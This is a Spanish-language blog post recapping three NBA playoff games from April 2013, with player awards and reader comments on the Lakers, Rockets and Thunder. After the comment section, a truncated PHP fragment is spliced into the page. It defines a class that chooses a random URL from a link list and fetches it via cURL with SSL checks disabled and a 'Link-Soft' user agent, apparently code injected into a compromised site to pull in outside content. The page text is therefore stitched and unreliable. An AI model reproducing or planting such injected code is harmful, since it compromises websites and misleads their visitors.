La Crónica: Encarrilados

25 de April de 2013 por txusma

Anoche vimos victorias claras de Pacers y Spurs y con un poco más de suspense por parte de los Thunder. Los tres equipos se ponen 2-0 y vuelan a casa de sus rivales con ganas de finiquitar la eliminatoria por la vía rápida.

kd rocketsEl partido más emocionante lo vivimos en Oklahoma City. Kevin McHale puso de inicio sobre la cancha a Lin, Beverly, Harden, Parsons y Asik, 5 jugadores que no habían jugado ni un minuto juntos durante toda la temporada, y mantuvo la apuesta por el ‘small-ball’ durante todo el partido. Con estos ingredientes, los Rockets salieron y apretaron a los Thunder durante toda la primera parte. Esta vez sí pudo James Harden anotar con fluidez y estuvo muy bien acompañado por el sorprendente Patrick Beverley, que emerge como factor X de la serie. Sin embargo, a 9 minutos para el final, Oklahoma se ponía 15 puntos arriba y parecía decantar definitivamente el encuentro a su favor. Jeremy Lin se había lesionado durante la primera mitad y los Rockets habían dejado de anotar con fluidez pero un arranque de vergüenza torera liderado, de nuevo, por Harden y Beverly le dio la vuelta al marcador y puso a los Rockets 2 arriba a falta de poco menos de 3 minutos. Fue en ese momento cuando apareció Kevin Durant y decidió el partido con un triple y una asistencia para el triple Thabo Sefolosha (102-105). Partido para el optimismo de los Rockets que viajan a casa con un 2-0 en contra pero con energía y espíritu renovados.

tp blakeLos Hawks se pusieron dos veces por delante en el marcador durante el primer cuarto. Ni una más. Ese período acabó con 6 puntos de ventaja para los Pacers, ventaja que gestionaron e incrementaron hasta un máximo de 24 puntos a poco de acabar el partido. La superioridad de los Pacers fue total. Con Paul George de nuevo en estado de gracia y un George Hill que se supone que está tocado pero no lo parece, el equipo de Frank Vogel controló los débiles intentos de los Hawks por acercarse de nuevo en el marcador aportando siempre un gramo más de fuerza y energía que sus rivales (98-113). El acierto desde la línea de 3 hizo el resto. 2-0 y muy buenas sensaciones.

Los Lakers vieron la luz tras el primer partido: “Si somos capaces de tirar mejor podemos ganar”. Lo hicieron en el segundo, el problema es que los Spurs también mejoraron. La inexistente defensa exterior de los Lakers permitió a los tejanos alcanzar el 51% de acierto en el tiro y a Tony Parker campar a sus anchas. En la primera parte los californianos aún pudieron contener a San Antonio, pero en la segunda, el cansancio, los problemas de faltas de Howard, el mal estado de físico de Nash y Blake y las bajas (Jodie Meeks no disputó el partido por un esguince de tobillo) les dejó sin gasolina y a merced de Parker. El francés, con 15 puntos en el tercer cuarto, finiquitó el partido (91-102). Esta vez Pau no estuvo muy acertado, sobre todo en la segunda parte, y no fue capaz de liderar a los suyos.

PREMIOS

hibb george

MVP: Trío de ases para el premio. Tony Parker se mostró muy recuperado y tumbó a los Lakers con 28 puntos y 7 asistencias sin pérdidas; Kevin Durant fue decisivo, como ya hemos explicado en la crónica, y finalizó con 29 puntos, 4 rebotes y 9 asistencias; y Paul George volvió a ser la pesadilla de los Hawks, y tras su triple doble en el primer partido, anoche logró 27 puntos, 8 rebotes, 4 robos y 3 asistencias.

Rookie: Serviría también para la sorpresa del día, pero la ausencia de competidores le otorga a Patrick Beverley el premio al mejor novato de la noche. McHale le dio la titularidad y Beverley respondió con 16 puntos, 12 rebotes, 6 asistencias y 2 robos.

Sorpresa:  Todas las miserias de los Lakers quedan destapadas cuando Matt Bonner les hace un traje cada vez que sale a pista. Esta vez fueron 10 puntos (4/5 tiros), 5 rebotes, 3 robos, 1 asistencia y 1 tapón de Red Mamba.

Decepción: La inercia positiva que parecían traer los Lakers del final de la regular season se ha quedado en nada. La plantilla se descorcha con las lesiones (Blake se sumó anoche a la lista) y los angelinos regresan de San Antonio con un 2-0 en contra. Pau Gasol va a tener que mejorar su rendimiento y su energía sobre el parquet para que la eliminatoria se alargue más allá del cuarto partido.

Esfuerzo en vano: No fue particularmente eficiente (9/24 en tiros de campo y 6 pérdidas) pero nadie puede discutirle a James Harden su excelente producción en la segunda derrota de los Rockets: 36 puntos, 11 rebotes, 6 asistencias. Posiblemente estos números habría valido una victoria de no ser por Kevin Durant.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Denise dice:
    #1

    El mote de Bonner que es Red Mamba?? Lo que faltaba…

    Por cierto, esperaba mas de Atlanta. Para mi, la decepción por el momento de estos playoffs.

      Citar

  2. HisRoyalAirness dice:
    #2

    D´Antoni en un tiempo muerto: “han hecho 6 puntos en contraataques, tenemos que correr más!”
    Este tío es idiota. Pero cómo vas a irte a marcadores altos sin Kobe?? Qué prisa tienes??
    Cuando coinciden Pau y Howard con Nash la cosa va bastante bien pero luego se empeña en poner a uno solo de los grandes y dejar que Blake y Artest tiren lo que quieran (Blake tiró más que Gasol y DH12).
    Tan difícil es jugar pick&roll en transición o meter el balón en el poste bajo? Es desesperante

      Citar

  3. Esteban dice:
    #3

    si sinceramente la geston de plantilla de d´antoni es desesperante, creo que nunca e la historia de la nba, un entrenador ha errado tanto en el estilo que quiere imponer a sus jugadores

      Citar

  4. GreenPride dice:
    #4

    Bueno día de confirmaciones en estos Playoffs.
    Empecemos por el final. Bienvenido a los Playofss Tony Parker. Los Lakers sin Kobe luchan por mantenerse pero han perdido los dos partidos claramente. Con Ginobilli a buen nivel y Parker de nuevo liderando a los Spurs y con el mejor Duncan de los últimos tiempos los Lakers tienen poco que hacer con un Nash al 50%, sin Kobe y con D’Antoni empeñado en acelerar el ritmo cuando lo que deberían hacer es embarrar partidos y jugar en media cancha para intentar que sus dos interiores que están siendo los mejores marcaran aún más las diferencias. Por tanto, con este entrenador y este panorama de lesiones y demás la cosa parece clara y estas series van a ser una buena pretemporada para los Spurs de cara a la segunda ronda.
    En el otro partido del Oeste del día, los Thunder sufrieron más de la cuenta ante los jóvenes Rockets. Estos Rockets son un equipo peligroso y con un líder sólido (Harden) y con buenos movimientos tienen un futuro muy prometedor. Ayer dieron un susto a OKC a base de nunca rendirse y de atacar y atacar con todo. Finalmente las actuaciones de Durant&Westbrook fueron demasiado pero yo sigo viendo lagunas en los Thunder de cara a próximas eliminatorias. Mucho 1×1 en ataque y un Wesbrook hiperacelerado lo que a veces les beneficia pero otras les perjudica seriamente. Veremos que tal se las apañan si como todo indica se enfrentan a los Clippers en segunda ronda.
    Y en el Este para mí la nada sorprendente caida de los Hawks ante los Pacers. Los Hawks son un equipo sin mucho alma más allá de la que pone Horford y ante un gran equipo como Indiana yo no esperaba mucho de ellos. Se han llevado un par de buenos repasos y aunque en casa lo pondrán más difícil no veo las series pasando del 5º partido.
    En verdad esta primera ronda está decepcionando un poco y no parece que los favoritos vayan a pasar muchos apuros más allá de lo que unos locos tiradores de triples de la Bahía de San Francisco liderados por “Cara de Niño” Curry puedan hacer…

      Citar

  5. Ruxixón dice:
    #5

    La aportación de Beverley,más allá de sus numerazos (16 puntos-6 asistencias-12 rebotes),fue clave en la defensa a Westbrook.Además muy inteligente el rookie picándole y es que Westbrook para eso es de calentura fácil,lo malo que lo mismo te hace una técnica y se corona haciendo una mierda de selección en el tiro como se pone en el modo “on fire” del NBA Jam y te sacude a la de bien.Casualmente la peor racha de Houston llegó con Beverley en el banquillo por faltas.Atentos a este duelo en los próximos partidos.

    Durant a la chita callando porque viendo el partido parece que no estuvo ahí salvo en los minutos finales,con un triple de los suyos a zona de McHale y esa asistencia a Sefo clave para finiquitar el partido.

      Citar

  6. Ruxixón dice:
    #6

    Por cierto,que se echa de menos en los Rockets un segundo tio que te aporte sumando puntos,de ahí esas minutadas de los jugadores importantes.Van a tirarle la caña a Josh Smith segurísimo.

      Citar

  7. MagicJohnson32 dice:
    #7

    Podemos criticar a D’Antoni todo lo que queráis. Yo me sumaré a las críticas por muchos motivos. Pero los Lakers no corrieron y D’Antoni no tiene la culpa de muchos de los principales problemas del equipo en esta serie. Nash está cojo. Cojo de verdad. Y ahora también Meeks y Blake. ¿Quién es el mejor guard que les queda a los Lakers? ¿Morris, Duhon o Goudelock? Elegid vosotros, que a mí me da la risa.
    ¿Tiene la culpa D’Antoni de que Gasol y Howard no sean capaces de aplastar a Bonner? ¿Cómo es posible que Bonner juegue 30 minutos? No puede ser que Popo se pueda permitir tener a Bonner tanto tiempo en pista.

    No sé qué equipo podrán sacar los Lakers el viernes para el tercer partido, pero no veo que vayan a necesitar mucho para ganar un par de partidos a estos Spurs. A Howard le han pitado 10 faltas en contra en estos dos partidos y ha lanzado 12 tiros libres. Estoy seguro de que en el Staples esas cifras cambiarán.

      Citar

  8. MagicJohnson32 dice:
    #8

    Por cierto, en el triple de Sefolosha a asistencia de Durant, hay una falta escandalosa de Perkins a Parsons: http://www.youtube.com/watch?feature=player_embedded&v=hjR9t5ZXuHI

    Y ya que estamos, aprovecho para comentar el asco que da Perkins.

      Citar

  9. nba dice:
    #9

    Es que Parker es mucho Parker, independientemente de eso Pau y Howard pueden y deben dar mas de si.
    Pero D’antoni deberia saber a estas alturas que quien debe defender a “Red Mamba”, son o Clark o Jamison,
    ya que suele estar revoloteando por la linea de tres, ya que sino van a volver a revivir lo sufrido durante la regular-season.
    Lo que esta claro es que Kobe hara acto de presencia en el Staples y eso sin ninguna duda pondra las pilas a sus compañeros.
    Vistas como estan las cosas el titular en lo que queda de serie deberia ser Goudelock

      Citar

  10. Ruxixón dice:
    #10

    Perkins además es gilipollas,hizo dos faltas absurdas que mandaron a la línea a Harden cuando eran ataques o situaciones que no iban a llegar a buen puerto en el momento de la falta.Luego esa falta que comentas en principio pensaba que había sido el choque en el bloqueo pero cuando se vio la repetición se vio lo que se tuvo que ver.De todas formas Oklahoma está muy protegido por el estamento arbitral más allá del típico aire casero en los PO.A Perkins le tendrían que expulsar cada 20 min y pitarle en ese tiempo 3 seg unas cuantas veces,pero bueno,nada nuevo bajo el sol.

    Por cierto,el nivel de Ibaka super

      Citar

  11. Esteban dice:
    #11

    hoy si los clippers ganan dan el golpe de gracia, sencillamente veo a menphis muy limitado en ofensiva para PO, donde las defensas se ajustan y con mover la bola no alcanza

    los clippers, con griffin, cp3 y crawford, tienen ese tiro dificil y exigido con chances de entrar que no lo tienen los grizzlies, sin gay

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>